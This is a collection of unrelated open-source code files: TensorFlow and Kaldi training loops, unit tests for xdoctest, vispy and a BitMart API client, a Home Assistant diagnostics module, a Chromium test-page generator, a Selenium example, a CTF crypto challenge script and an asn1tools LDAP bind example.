eval_loop_fn: Eval loop function.
create_metrics_fn: create_metric_fn.
eval_folder: A path to where the summary event files and checkpoints will be
saved.
eval_datasets: A dictionary of evaluation tf.data.Dataset to loop through for
evaluation.
summary_writer_fn: A callable that takes the output of
distributed_train_step_fn and writes summaries to be visualized in
TensorBoard.
train_folder: A path to where the summaries event files and checkpoints
will be saved.
saved_model_folder: A path to where the saved models are stored.
num_iterations: An integer, the number of iterations to train for.
save_summaries_frequency: The iteration frequency with which summaries are
saved.
save_checkpoint_frequency: The iteration frequency with which model
checkpoints are saved.
checkpoint_max_to_keep: The maximum number of checkpoints to keep.
checkpoint_save_every_n_hours: The frequency in hours to keep checkpoints.
timing_frequency: The iteration frequency with which to log timing.
logging_frequency: How often to output with logging.info().
"""
logging.info('Creating training tensorboard summaries ...')
summary_writer = tf.summary.create_file_writer(train_folder)
if eval_datasets is not None:
logging.info('Creating eval tensorboard summaries ...')
eval_summary_writer = tf.summary.create_file_writer(eval_folder)
train_set = strategy.experimental_distribute_dataset(train_set)
with strategy.scope():
logging.info('Building model ...')
model = create_model_fn()
loss_functions = create_losses_fn()
optimizer = create_optimizer_fn()
if eval_datasets is not None:
metrics = create_metrics_fn()
logging.info('Creating checkpoint ...')
checkpoint = tf.train.Checkpoint(
model=model,
optimizer=optimizer,
step=optimizer.iterations,
epoch=tf.Variable(0, dtype=tf.int64, trainable=False),
training_finished=tf.Variable(False, dtype=tf.bool, trainable=False))
logging.info('Restoring old model (if exists) ...')
checkpoint_manager = tf.train.CheckpointManager(
checkpoint,
directory=train_folder,
max_to_keep=checkpoint_max_to_keep,
keep_checkpoint_every_n_hours=checkpoint_save_every_n_hours)
with strategy.scope():
if checkpoint_manager.latest_checkpoint:
checkpoint.restore(checkpoint_manager.latest_checkpoint)
logging.info('Creating Timer ...')
timer = tf.estimator.SecondOrStepTimer(every_steps=timing_frequency)
timer.update_last_triggered_step(optimizer.iterations.numpy())
logging.info('Training on devices: %s.', [
el.name.split('/physical_device:')[-1]
for el in tf.config.get_visible_devices()
])
# Re-assign training_finished=False, in case we restored a checkpoint.
checkpoint.training_finished.assign(False)
while optimizer.iterations.numpy() < num_iterations:
for i_batch, batch in enumerate(train_set):
summary_writer.set_as_default()
iterations = optimizer.iterations.numpy()
if iterations % logging_frequency == 0:
# Log epoch, total iterations and batch index.
logging.info('epoch %d; iterations %d; i_batch %d',
checkpoint.epoch.numpy(), iterations,
i_batch)
# Break if the number of iterations exceeds the max.
if iterations >= num_iterations:
break
# Compute distributed step outputs.
distributed_step_outputs = distributed_train_step_fn(
strategy, batch, model, loss_functions, optimizer, iterations)
# Save checkpoint, and optionally run the eval loops.
if iterations % save_checkpoint_frequency == 0:
checkpoint_manager.save(checkpoint_number=iterations)
if eval_datasets is not None:
eval_loop_fn(
strategy=strategy,
eval_base_folder=eval_folder,
model=model,
metrics=metrics,
datasets=eval_datasets,
summary_writer=eval_summary_writer,
checkpoint_step=iterations)
# Write summaries.
if iterations % save_summaries_frequency == 0:
tf.summary.experimental.set_step(step=iterations)
summary_writer_fn(distributed_step_outputs)
tf.summary.scalar('learning_rate',
optimizer.learning_rate(iterations).numpy())
# Log steps/sec.
if timer.should_trigger_for_step(iterations):
elapsed_time, elapsed_steps = timer.update_last_triggered_step(
iterations)
if elapsed_time is not None:
steps_per_second = elapsed_steps / elapsed_time
tf.summary.scalar(
'steps/sec', steps_per_second, step=optimizer.iterations)
# Increment epoch.
checkpoint.epoch.assign_add(1)
# Assign training_finished variable to True after training is finished and
# save the last checkpoint.
checkpoint.training_finished.assign(True)
checkpoint_manager.save(checkpoint_number=optimizer.iterations.numpy())
# Generate a saved model.
model.save(saved_model_folder)
def train(strategy: tf.distribute.Strategy, train_folder: str,
saved_model_folder: str, n_iterations: int,
create_model_fn: Callable[..., tf.keras.Model],
create_losses_fn: Callable[..., Dict[str,
Tuple[Callable[..., tf.Tensor],
Callable[...,
tf.Tensor]]]],
create_metrics_fn: Callable[..., Dict[str, tf.keras.metrics.Metric]],
dataset: tf.data.Dataset,
learning_rate: tf.keras.optimizers.schedules.LearningRateSchedule,
eval_loop_fn: Callable[..., None],
eval_folder: str,
eval_datasets: Dict[str, tf.data.Dataset]):
"""Training function that is strategy agnostic.
Args:
strategy: A Tensorflow distributed strategy.
train_folder: A path to where the summaries event files and checkpoints
will be saved.
saved_model_folder: A path to where the saved models are stored.
n_iterations: An integer, the number of iterations to train for.
create_model_fn: A callable that returns tf.keras.Model.
create_losses_fn: A callable that returns the losses.
create_metrics_fn: A function that returns the metrics dictionary.
dataset: The tensorflow dataset object.
learning_rate: Keras learning rate schedule object.
eval_loop_fn: eval loop function.
eval_folder: A path to where eval summaries event files and checkpoints
will be saved.
eval_datasets: The tensorflow evaluation dataset objects.
"""
train_loop(
strategy=strategy,
train_set=dataset,
create_model_fn=create_model_fn,
create_losses_fn=create_losses_fn,
create_optimizer_fn=functools.partial(
tf.keras.optimizers.Adam, learning_rate=learning_rate),
distributed_train_step_fn=_distributed_train_step,
eval_loop_fn=eval_loop_fn,
create_metrics_fn=create_metrics_fn,
eval_folder=eval_folder,
eval_datasets=eval_datasets,
summary_writer_fn=_summary_writer,
train_folder=train_folder,
saved_model_folder=saved_model_folder,
num_iterations=n_iterations,
save_summaries_frequency=3000,
save_checkpoint_frequency=3000)
def get_strategy(mode) -> tf.distribute.Strategy:
"""Creates a distributed strategy."""
strategy = None
if mode == 'cpu':
strategy = tf.distribute.OneDeviceStrategy('/cpu:0')
elif mode == 'gpu':
strategy = tf.distribute.MirroredStrategy()
else:
raise ValueError('Unsupported distributed mode.')
return strategy
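# A minimal sketch of how these pieces are typically wired together (the factories, paths and
# schedule values below are assumptions for illustration, not part of this module):
#
#   strategy = get_strategy('gpu')
#   train(strategy=strategy,
#         train_folder='/tmp/train', saved_model_folder='/tmp/saved_model',
#         n_iterations=10000,
#         create_model_fn=create_model_fn, create_losses_fn=create_losses_fn,
#         create_metrics_fn=create_metrics_fn, dataset=train_dataset,
#         learning_rate=tf.keras.optimizers.schedules.PiecewiseConstantDecay(
#             boundaries=[5000], values=[1e-4, 1e-5]),
#         eval_loop_fn=eval_loop_fn, eval_folder='/tmp/eval', eval_datasets=None)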
|
testing/test_checker.py | MatsLanGoH/xdoctest | 142 | 128282 |
from xdoctest import checker
from xdoctest import directive
# from xdoctest import utils
def test_visible_lines():
"""
pytest testing/test_checker.py
"""
got = 'this is invisible\ronly this is visible'
print(got)
want = 'only this is visible'
assert checker.check_output(got, want)
def test_visible_lines_explicit():
"""
pytest testing/test_checker.py
"""
got = 'invisible\rIS-visible'
want = 'invisible\rIS-visible'
# The got-want checker is quite permissive.
# Use asserts for non-permissive tests.
assert checker.check_output(got, want)
def test_blankline_accept():
"""
pytest testing/test_checker.py
"""
# Check that blankline is normalized away
runstate = directive.RuntimeState({'DONT_ACCEPT_BLANKLINE': False})
got = 'foo\n\nbar'
want = 'foo\n<BLANKLINE>\nbar'
assert checker.check_output(got, want, runstate)
def test_blankline_failcase():
# Check that blankline is not normalized in a "got" statement
runstate = directive.RuntimeState({'DONT_ACCEPT_BLANKLINE': False})
got = 'foo\n<BLANKLINE>\nbar'
want = 'foo\n\nbar'
assert not checker.check_output(got, want, runstate)
def test_blankline_not_accept():
# Check that blankline is not normalized away when
# DONT_ACCEPT_BLANKLINE is on
runstate = directive.RuntimeState({'DONT_ACCEPT_BLANKLINE': True})
got = 'foo\n\nbar'
want = 'foo\n<BLANKLINE>\nbar'
assert not checker.check_output(got, want, runstate)
|
2017/EasyCTF/Security Through Obscurity/sage.py | Kage/CTF-Writeups | 191 | 128290 |
<gh_stars>100-1000
p = 196732205348849427366498732223276547339
secret = REDACTED
def calc_root(num, mod, n):
f = GF(mod)
temp = f(num)
return temp.nth_root(n)
def gen_v_list(primelist, p, secret):
a = []
for prime in primelist:
a.append(calc_root(prime, p, secret))
return a
def decodeInt(i, primelist):
pl = sorted(primelist)[::-1]
out = ''
for j in pl:
if i%j == 0:
out += '1'
else:
out += '0'
return out
def bin2asc(b):
return hex(int(b,2)).replace('0x','').decode('hex')
primelist = [2,3,5,7,11,13,17,19,23,29,31,37,43,47,53,59]
message = REDACTED
chunks = []
for i in range(0,len(message),2):
chunks += [message[i:i+2]]
vlist = gen_v_list(primelist,p,secret)
print(vlist)
for chunk in chunks:
binarized = bin(int(chunk.encode('hex'),16)).replace('0b','').zfill(16)[::-1] #lsb first
enc = 1
for bit in range(len(binarized)):
enc *= vlist[bit]**int(binarized[bit])
enc = enc%p
print(enc)
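# Illustrative note (not in the original script): decodeInt walks the primes in descending
# order, so decodeInt(2*3*5, [2, 3, 5, 7]) checks 7, 5, 3, 2 in turn and yields '0111'
# (not divisible by 7; divisible by 5, 3 and 2).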
|
homeassistant/components/august/diagnostics.py | MrDelik/core | 30,023 | 128369 |
<filename>homeassistant/components/august/diagnostics.py
"""Diagnostics support for august."""
from __future__ import annotations
from typing import Any
from homeassistant.components.diagnostics import async_redact_data
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from . import AugustData
from .const import DOMAIN
TO_REDACT = {
"HouseID",
"OfflineKeys",
"installUserID",
"invitations",
"key",
"pins",
"pubsubChannel",
"recentImage",
"remoteOperateSecret",
"users",
"zWaveDSK",
}
async def async_get_config_entry_diagnostics(
hass: HomeAssistant, entry: ConfigEntry
) -> dict[str, Any]:
"""Return diagnostics for a config entry."""
data: AugustData = hass.data[DOMAIN][entry.entry_id]
return {
"locks": {
lock.device_id: async_redact_data(
data.get_device_detail(lock.device_id).raw, TO_REDACT
)
for lock in data.locks
},
"doorbells": {
doorbell.device_id: async_redact_data(
data.get_device_detail(doorbell.device_id).raw, TO_REDACT
)
for doorbell in data.doorbells
},
}
|
vispy/scene/cameras/tests/test_link.py | hmaarrfk/vispy | 2,617 | 128371 |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
from vispy.scene.widgets import ViewBox
from vispy.testing import run_tests_if_main
def test_turntable_camera_link():
vbs = [ViewBox(camera='turntable') for _ in range(3)]
cams = [vb.camera for vb in vbs]
for cam in cams:
cam.elevation = 45.0
cam.azimuth = 120.0
cam.scale_factor = 4.0
cams[0].link(cams[1])
cams[0].link(cams[2], props=['azimuth', 'elevation'])
cams[1].elevation = 30.0
cams[1].azimuth = 90.0
cams[1].scale_factor = 2.0
assert cams[0].elevation == 30.0
assert cams[0].azimuth == 90.0
assert cams[0].scale_factor == 2.0
assert cams[2].elevation == 30.0
assert cams[2].azimuth == 90.0
assert cams[2].scale_factor == 4.0
def test_panzoom_link():
vbs = [ViewBox(camera='panzoom') for _ in range(4)]
cams = [vb.camera for vb in vbs]
for cam in cams:
cam.rect = (0, 0, 100, 100)
cams[0].link(cams[1])
cams[0].link(cams[2], axis='x')
cams[0].link(cams[3], axis='y')
cams[1].rect = (-20, -20, 130, 130)
assert cams[0].rect.pos == (-20, -20) and cams[0].rect.size == (130, 130)
assert cams[2].rect.pos == (-20, 0) and cams[2].rect.size == (130, 100)
assert cams[3].rect.pos == (0, -20) and cams[3].rect.size == (100, 130)
run_tests_if_main()
|
discovery-provider/src/queries/get_route_metrics_test.py | ppak10/audius-protocol | 429 | 128383 |
<reponame>ppak10/audius-protocol
def test():
"""See /tests/test_get_route_metrics.py"""
|
codigo_das_aulas/aula_05/aula_05_03.py | VeirichR/curso-python-selenium | 234 | 128395 |
from selenium.webdriver import Firefox
url = 'http://selenium.dunossauro.live/aula_05_c.html'
firefox = Firefox()
firefox.get(url)
def melhor_filme(browser, filme, email, telefone):
"""Fill in the form for the best film of 2020."""
browser.find_element_by_name('filme').send_keys(filme)
browser.find_element_by_name('email').send_keys(email)
browser.find_element_by_name('telefone').send_keys(telefone)
browser.find_element_by_name('enviar').click()
melhor_filme(
firefox,
'Parasita',
'<EMAIL>',
'(019)987654321'
)
firefox.quit()
|
src/aptsources_cleanup/util/version/__main__.py | butayama/aptsources-cleanup | 461 | 128475 |
<gh_stars>100-1000
# -*- coding: utf-8
"""Generate the content of a ._data module for use with this package"""
import sys, locale
from . import version_info
locale.setlocale(locale.LC_ALL, '')
if len(sys.argv) > 1:
version = sys.argv[1]
else:
version = input()
output = sys.stdout
if not output.encoding:
import codecs
encoding = locale.getpreferredencoding()
output = codecs.getwriter(encoding)(output)
output.encoding = encoding
with output:
version_info.from_repo(version)._print_data_module(output)
|
src/zuthaka/backendapi/services/ClassHandlers/Covenant/__init__.py | justinforbes/zuthaka | 129 | 128482 |
<gh_stars>100-1000
from .covenantc2 import *
|
test/hummingbot/connector/exchange/bitmart/test_bitmart_auth.py | BGTCapital/hummingbot | 3,027 | 128507 |
<reponame>BGTCapital/hummingbot<filename>test/hummingbot/connector/exchange/bitmart/test_bitmart_auth.py
import json
import hmac
import hashlib
from unittest import TestCase
from hummingbot.connector.exchange.bitmart.bitmart_auth import BitmartAuth
class BitmartAuthTests(TestCase):
@property
def memo(self):
return '001'
@property
def api_key(self):
return 'test_api_key'
@property
def secret_key(self):
return 'test_secret_key'
def test_no_authentication_headers(self):
auth = BitmartAuth(api_key=self.api_key, secret_key=self.secret_key, memo=self.memo)
headers = auth.get_headers()
self.assertEqual(1, len(headers))
self.assertEqual('application/json', headers.get('Content-Type'))
def test_keyed_authentication_headers(self):
auth = BitmartAuth(api_key=self.api_key, secret_key=self.secret_key, memo=self.memo)
headers = auth.get_headers(auth_type="KEYED")
self.assertEqual(2, len(headers))
self.assertEqual('application/json', headers.get("Content-Type"))
self.assertEqual('test_api_key', headers.get('X-BM-KEY'))
def test_signed_authentication_headers(self):
auth = BitmartAuth(api_key=self.api_key, secret_key=self.secret_key, memo=self.memo)
timestamp = '1589793795969'
params = {'test_key': 'test_value'}
headers = auth.get_headers(timestamp=timestamp, params=params, auth_type="SIGNED")
params = json.dumps(params)
raw_signature = f'{timestamp}#{self.memo}#{params}'
expected_signature = hmac.new(self.secret_key.encode('utf-8'),
raw_signature.encode('utf-8'),
hashlib.sha256).hexdigest()
self.assertEqual(4, len(headers))
self.assertEqual('application/json', headers.get("Content-Type"))
self.assertEqual('test_api_key', headers.get('X-BM-KEY'))
self.assertEqual(expected_signature, headers.get('X-BM-SIGN'))
self.assertEqual('1589793795969', headers.get('X-BM-TIMESTAMP'))
def test_ws_auth_payload(self):
auth = BitmartAuth(api_key=self.api_key, secret_key=self.secret_key, memo=self.memo)
timestamp = '1589793795969'
auth_info = auth.get_ws_auth_payload(timestamp=timestamp)
raw_signature = f'{timestamp}#{self.memo}#bitmart.WebSocket'
expected_signature = hmac.new(self.secret_key.encode('utf-8'),
raw_signature.encode('utf-8'),
hashlib.sha256).hexdigest()
self.assertEqual(2, len(auth_info))
self.assertEqual(3, len(auth_info.get('args')))
self.assertEqual('login', auth_info.get('op'))
self.assertEqual(['test_api_key', '1589793795969', expected_signature], auth_info.get('args'))
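# Minimal sketch (mirrors what the tests above expect; the values are the test fixtures, not real keys)
# of how a BitMart "SIGNED" header signature is computed:
#
#   import hashlib, hmac, json
#   timestamp, memo, secret = '1589793795969', '001', 'test_secret_key'
#   payload = json.dumps({'test_key': 'test_value'})
#   sign = hmac.new(secret.encode('utf-8'), f'{timestamp}#{memo}#{payload}'.encode('utf-8'),
#                   hashlib.sha256).hexdigest()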
|
ui/file_manager/file_manager/test/scripts/create_test_main.py | zipated/src | 2,151 | 128508 |
#!/usr/bin/env python
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Copies file_manager/main.html to file_manager/test.html.
Modifies it to be able to run the CrOS FileManager app
as a regular web page in a single renderer.
"""
import argparse
import os
import sys
assert __name__ == '__main__'
parser = argparse.ArgumentParser()
parser.add_argument('--output')
args = parser.parse_args()
# ROOT=//ui/file_manager/file_manager
ROOT = os.path.abspath(os.path.join(sys.path[0], '../..'))
scripts = []
GENERATED_HTML = ('<!-- Generated by:\n -- ui/file_manager/file_manager/'
'tests/scripts/create_test_main.py\n -->\n\n')
GENERATED_JS = ('// Generated by:\n// ui/file_manager/file_manager/'
'tests/scripts/create_test_main.py\n\n')
def read(path):
with open(os.path.join(ROOT, path)) as f:
return f.read()
def write(path, content):
fullpath = os.path.join(ROOT, path)
if not os.path.exists(os.path.dirname(fullpath)):
os.makedirs(os.path.dirname(fullpath))
with open(fullpath, 'w') as f:
f.write(content)
def replaceline(f, match, lines):
"""Replace matching line in file with lines."""
for i in range(len(f)):
if match in f[i]:
return f[:i] + lines + f[i+1:]
return f
def includes2scripts(include_filename):
"""Convert <include src='foo'> to <script src='<prefix>foo'></script>."""
scripts.append('<!-- %s -->' % include_filename)
prefix = include_filename[:include_filename.rindex('/')+1]
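# For example (illustrative path, not from the real sources): with
# include_filename = 'foreground/js/main_scripts.js', a line such as
#   // <include src="foo/bar.js">
# becomes
#   <script src="foreground/js/foo/bar.js"></script>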
f = read(include_filename).split('\n')
for i in range(len(f)):
l = f[i]
# Join back any include with a line-break.
if l == '// <include' and f[i+1].startswith('// src='):
f[i+1] = l + f[i+1][2:]
continue
if l.startswith('// <include '):
l = l.replace('// <include ', '<script ')
# Special fix for analytics.
if 'webui/resources/js/analytics.js' in l:
l = l.replace('webui/resources/js/analytics.js',
'../third_party/analytics/google-analytics-bundle.js')
# main.js should be defer.
if 'src="main.js"' in l:
l = l.replace('src="main.js"', 'src="main.js" defer')
# Fix the path for scripts to be relative to ROOT.
if 'src="../../' in l:
l = l.replace('src="../../', 'src="')
else:
l = l.replace('src="', 'src="' + prefix)
tag = l + '</script>'
if tag not in scripts:
scripts.append(tag)
# Fix link to action_link.css and text_defaults.css.
main_html = (read('main.html')
.replace('chrome://resources/css/action_link.css',
'../../webui/resources/css/action_link.css')
.replace('chrome://resources/css/text_defaults.css',
'test/gen/css/text_defaults.css')
.split('\n'))
# Fix text_defaults.css. Copy and replace placeholders.
text_defaults = (read('../../webui/resources/css/text_defaults.css')
.replace('$i18n{textDirection}', 'ltr')
.replace('$i18nRaw{fontFamily}', 'Roboto, sans-serif')
.replace('$i18nRaw{fontSize}', '75%'))
write('test/gen/css/text_defaults.css', GENERATED_HTML + text_defaults)
# Fix stylesheet from extension.
main_html = replaceline(
main_html,
('chrome-extension://fbjakikfhfdajcamjleinfciajelkpek/'
'cws_widget/cws_widget_container.css'),
[('<link rel="stylesheet" href="../../../components/chrome_apps/'
'webstore_widget/cws_widget/cws_widget_container.css">')])
# Add scripts required for testing, and the test files (test/*.js).
scripts.append('<!-- required for testing -->')
scripts += ['<script src="%s"></script>' % s for s in [
'test/js/chrome_api_test_impl.js',
'../../webui/resources/js/assert.js',
'../../webui/resources/js/cr.js',
'../../webui/resources/js/cr/event_target.js',
'../../webui/resources/js/cr/ui/array_data_model.js',
'../../webui/resources/js/load_time_data.js',
'../../webui/resources/js/webui_resource_test.js',
'test/js/strings.js',
'common/js/util.js',
'common/js/mock_entry.js',
'common/js/volume_manager_common.js',
'background/js/volume_info_impl.js',
'background/js/volume_info_list_impl.js',
'background/js/volume_manager_impl.js',
'background/js/mock_volume_manager.js',
'foreground/js/constants.js',
'test/js/chrome_file_manager.js',
'test/js/test_util.js',
] + ['test/' + s for s in os.listdir(os.path.join(ROOT, 'test'))
if s.endswith('.js')]]
# Convert all includes from:
# * foreground/js/main_scripts.js
# * background/js/background_common_scripts.js
# * background/js/background_scripts.js
# into <script> tags in main.html.
# Add polymer libs at start.
bg_scripts = read('background/js/background_scripts.js').split('\n')
includes2scripts('foreground/js/main_scripts.js')
includes2scripts('background/js/background_common_scripts.js')
includes2scripts('background/js/background_scripts.js')
main_html = replaceline(main_html, 'foreground/js/main_scripts.js', [
('<link rel="import" href="../../../third_party/polymer/v1_0/'
'components-chromium/polymer/polymer.html">'),
('<link rel="import" href="../../../third_party/polymer/v1_0/'
'components-chromium/paper-progress/paper-progress.html">'),
] + scripts)
# Load QuickView in iframe rather than webview.
# Change references in files_quick_view.html to use updated
# files_safe_media.html which will use webview rather than iframe,
# and sets src directly on iframe.
for filename, substitutions in (
('elements/files_quick_view.html', (
('="files_icon', '="../../../foreground/elements/files_icon'),
('="files_metadata', '="../../../foreground/elements/files_metadata'),
('="files_tooltip', '="../../../foreground/elements/files_tooltip'),
('="files_quick', '="../../../foreground/elements/files_quick'),
('="icons', '="../../../foreground/elements/icons'),
('webview', 'iframe'),
)),
('elements/files_safe_media.html', (('webview', 'iframe'),)),
('elements/files_safe_media.js', (
("'webview'", "'iframe'"),
("'contentload'", "'load'"),
('this.webview_.contentWindow.postMessage(data, FILES_APP_ORIGIN);',
('this.webview_.contentWindow.content.type = this.type;'
'this.webview_.contentWindow.content.src = this.src;')),
)),
):
buf = read('foreground/' + filename)
for old, new in substitutions:
buf = buf.replace(old, new)
write('test/gen/' + filename, GENERATED_JS + buf)
main_html = replaceline(main_html, 'foreground/' + filename,
['<script src="test/gen/%s"></script>' % filename])
test_html = GENERATED_HTML + '\n'.join(main_html)
write('test.html', test_html)
# If --output is provided, also create specified file.
if args.output:
with open(args.output, 'w') as output:
output.write(test_html)
|
egs/voxceleb/v1/nnet/lib/train_mt.py | LCF2764/tf-kaldi-speaker | 154 | 128580 |
<reponame>LCF2764/tf-kaldi-speaker
import os
import argparse
import random
import sys
import tensorflow as tf
import numpy as np
from misc.utils import ValidLoss, load_lr, load_valid_loss, save_codes_and_config, compute_cos_pairwise_eer
from dataset.multitask.data_loader_v2 import KaldiDataRandomQueueV2
from dataset.kaldi_io import FeatureReaderV2
from six.moves import range
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--cont", action="store_true", help="Continue training from an existing model.")
parser.add_argument("--config", type=str, help="The configuration file.")
parser.add_argument("train_data_dir", type=str, help="The data directory of the training set.")
parser.add_argument("train_ali_dir", type=str, help="The ali directory of the training set.")
parser.add_argument("train_spklist", type=str, help="The spklist file maps the TRAINING speakers to the indices.")
parser.add_argument("valid_data_dir", type=str, help="The data directory of the validation set.")
parser.add_argument("valid_ali_dir", type=str, help="The ali directory of the validation set.")
parser.add_argument("valid_spklist", type=str, help="The spklist maps the VALID speakers to the indices.")
parser.add_argument("model", type=str, help="The output model directory.")
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.DEBUG)
args = parser.parse_args()
params = save_codes_and_config(args.cont, args.model, args.config)
# The model directory always has a folder named nnet
model_dir = os.path.join(args.model, "nnet")
# Set the random seed. The random operations may appear in data input, batch forming, etc.
tf.set_random_seed(params.seed)
random.seed(params.seed)
np.random.seed(params.seed)
if args.cont:
# If we continue training, we can figure out how many steps the model has been trained for,
# using the index of the checkpoint
import re
ckpt = tf.train.get_checkpoint_state(model_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
step = int(next(re.finditer(r"(\d+)(?!.*\d)", ckpt_name)).group(0))
else:
sys.exit("Cannot load checkpoint from %s" % model_dir)
start_epoch = int(step / params.num_steps_per_epoch)
else:
start_epoch = 0
learning_rate = params.learning_rate
learning_rate_array = []
if os.path.isfile(str(learning_rate)):
with open(str(learning_rate), "r") as f:
for line in f.readlines():
learning_rate_array.append(float(line.strip()))
# The size of the file should be large enough
assert len(learning_rate_array) > params.num_epochs, "The learning rate file is shorter than the num of epochs."
tf.logging.info("Using specified learning rate decay strategy.")
else:
# The learning rate is determined by the training process. However, if we continue training,
# the code doesn't know the previous learning rate if it is tuned using the validation set.
# To solve that, just save the learning rate to an individual file.
if os.path.isfile(os.path.join(model_dir, "learning_rate")):
learning_rate_array = load_lr(os.path.join(model_dir, "learning_rate"))
assert len(learning_rate_array) == start_epoch + 1, "Not enough learning rates in the learning_rate file."
else:
learning_rate_array = [float(learning_rate)] * (start_epoch + 1)
feat_reader = FeatureReaderV2(args.train_data_dir, args.train_ali_dir,
params.phone_left_context, params.phone_right_context)
dim = feat_reader.get_dim()
with open(os.path.join(model_dir, "feature_dim"), "w") as f:
f.write("%d\n" % dim)
feat_reader = KaldiDataRandomQueueV2(args.train_data_dir, args.train_ali_dir, args.train_spklist,
left_context=params.phone_left_context,
right_context=params.phone_right_context)
num_total_speakers = feat_reader.num_total_speakers
num_total_phones = feat_reader.num_total_phones
tf.logging.info("There are %d speakers and %d phones in the training set." % (num_total_speakers, num_total_phones))
tf.logging.info("The dim is %d." % dim)
with open(os.path.join(model_dir, "num_speakers"), "w") as f:
f.write("%d\n" % num_total_speakers)
with open(os.path.join(model_dir, "num_phones"), "w") as f:
f.write("%d\n" % num_total_phones)
# Load the history valid loss
min_valid_loss = ValidLoss()
if os.path.isfile(os.path.join(model_dir, "valid_loss")):
min_valid_loss = load_valid_loss(os.path.join(model_dir, "valid_loss"))
# TODO: Change the model name to train different models
from model.multitask_v1.base_v1 import BaseMT
trainer = BaseMT(params, args.model, dim, num_total_speakers, num_total_phones)
trainer.build("train")
trainer.build("valid")
if "early_stop_epochs" not in params.dict:
params.dict["early_stop_epochs"] = 10
if "min_learning_rate" not in params.dict:
params.dict["min_learning_rate"] = 1e-5
for epoch in range(start_epoch, params.num_epochs):
trainer.train(args.train_data_dir, args.train_ali_dir, args.train_spklist, learning_rate_array[epoch])
valid_loss, valid_embeddings, valid_labels = trainer.valid(args.valid_data_dir,
args.valid_ali_dir,
args.valid_spklist,
batch_type=params.batch_type,
output_embeddings=True)
eer = compute_cos_pairwise_eer(valid_embeddings, valid_labels)
tf.logging.info("[INFO] Valid EER: %f" % eer)
# Tune the learning rate if necessary.
if not os.path.isfile(str(learning_rate)):
new_learning_rate = learning_rate_array[epoch]
if valid_loss < min_valid_loss.min_loss:
min_valid_loss.min_loss = valid_loss
min_valid_loss.min_loss_epoch = epoch
else:
if epoch - min_valid_loss.min_loss_epoch >= params.reduce_lr_epochs:
new_learning_rate /= 2
# If the valid loss in the next epoch still does not reduce, the learning rate will keep reducing.
tf.logging.info("After epoch %d, no improvement. Reduce the learning rate to %.8f" % (
min_valid_loss.min_loss_epoch, new_learning_rate))
min_valid_loss.min_loss_epoch += 2
learning_rate_array.append(new_learning_rate)
if epoch == 0:
# If this is the first epoch, the first learning rate should be recorded
with open(os.path.join(model_dir, "learning_rate"), "a") as f:
f.write("0 %.8f\n" % learning_rate_array[0])
# Save the learning rate and loss for each epoch.
with open(os.path.join(model_dir, "learning_rate"), "a") as f:
f.write("%d %.8f\n" % (epoch + 1, learning_rate_array[epoch + 1]))
with open(os.path.join(model_dir, "valid_loss"), "a") as f:
f.write("%d %f %f\n" % (epoch, valid_loss, eer))
if not os.path.isfile(str(learning_rate)):
            # If the learning rate is too small, the training actually gets stuck.
            # Early stopping is also applied.
            # Both checks only apply when the learning rate is not specified in a file.
if learning_rate_array[epoch + 1] < (params.min_learning_rate - 1e-12) or \
epoch - min_valid_loss.min_loss_epoch >= params.early_stop_epochs:
break
# Close the session before we exit.
trainer.close()
|
tests/class_free.py
|
ZYAZP/python2
| 1,062 |
128652
|
<filename>tests/class_free.py
def f(x):
class c:
print x
f(3)
|
examples/ldap.py
|
cromulencellc/asn1tools
| 198 |
128654
|
#!/usr/bin/env python
"""Perform an LDAP bind with an LDAP server.
Example execution:
$ ./ldap.py
Connecting to ldap.forumsys.com:389... done.
{'messageID': 1,
'protocolOp': ('bindRequest',
{'authentication': ('simple', b'password'),
'name': b'uid=tesla,dc=example,dc=com',
'version': 3})}
Sending LDAP bind request to the server... done.
Receiving LDAP bind response from the server... done.
{'messageID': 1,
'protocolOp': ('bindResponse',
{'diagnosticMessage': bytearray(b''),
'matchedDN': bytearray(b''),
'resultCode': 'success'})}
{'messageID': 2,
'protocolOp': ('searchRequest',
{'attributes': [],
'baseObject': '',
'derefAliases': 'neverDerefAliases',
'filter': ('substrings',
{'substrings': [('any', 'fred')], 'type': 'cn'}),
'scope': 'wholeSubtree',
'sizeLimit': 0,
'timeLimit': 0,
'typesOnly': False})}
Sending LDAP search request to the server... done.
Receiving LDAP search response from the server... done.
{'messageID': 2,
'protocolOp': ('searchResDone',
{'diagnosticMessage': bytearray(b''),
'matchedDN': bytearray(b''),
'resultCode': 'noSuchObject'})}
$
"""
from __future__ import print_function
import os
import socket
from pprint import pprint
import asn1tools
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
RFC4511_ASN_PATH = os.path.join(SCRIPT_DIR,
'..',
'tests',
'files',
'ietf',
'rfc4511.asn')
HOST = 'ldap.forumsys.com'
PORT = 389
db = asn1tools.compile_files(RFC4511_ASN_PATH)
# Connect to the LDAP server.
sock = socket.socket()
print('Connecting to {}:{}... '.format(HOST, PORT), end='')
sock.connect((HOST, PORT))
print('done.')
print()
# Encode the LDAP bind request and send it to the server.
bind_request = {
'messageID': 1,
'protocolOp': (
'bindRequest',
{
'version': 3,
'name': b'uid=tesla,dc=example,dc=com',
'authentication': (
'simple', b'password'
)
}
)
}
encoded_bind_request = db.encode('LDAPMessage', bind_request)
pprint(bind_request)
print('Sending LDAP bind request to the server... ', end='')
sock.sendall(encoded_bind_request)
print('done.')
# Receive the bind response, decode it, and print it.
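# For these small messages the first two received bytes are enough for
# decode_length() to work out the total BER message size; the remainder is
# then requested from the socket.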
print('Receiving LDAP bind response from the server... ', end='')
encoded_bind_response = sock.recv(2)
length = db.decode_length(encoded_bind_response)
encoded_bind_response += sock.recv(length - 2)
print('done.')
bind_response = db.decode('LDAPMessage', encoded_bind_response)
pprint(bind_response)
print()
# Encode the LDAP search request and send it to the server.
search_request = {
'messageID': 2,
'protocolOp': (
'searchRequest',
{
'baseObject': b'',
'scope': 'wholeSubtree',
'derefAliases': 'neverDerefAliases',
'sizeLimit': 0,
'timeLimit': 0,
'typesOnly': False,
'filter': (
'substrings',
{
'type': b'\x63\x6e',
'substrings': [
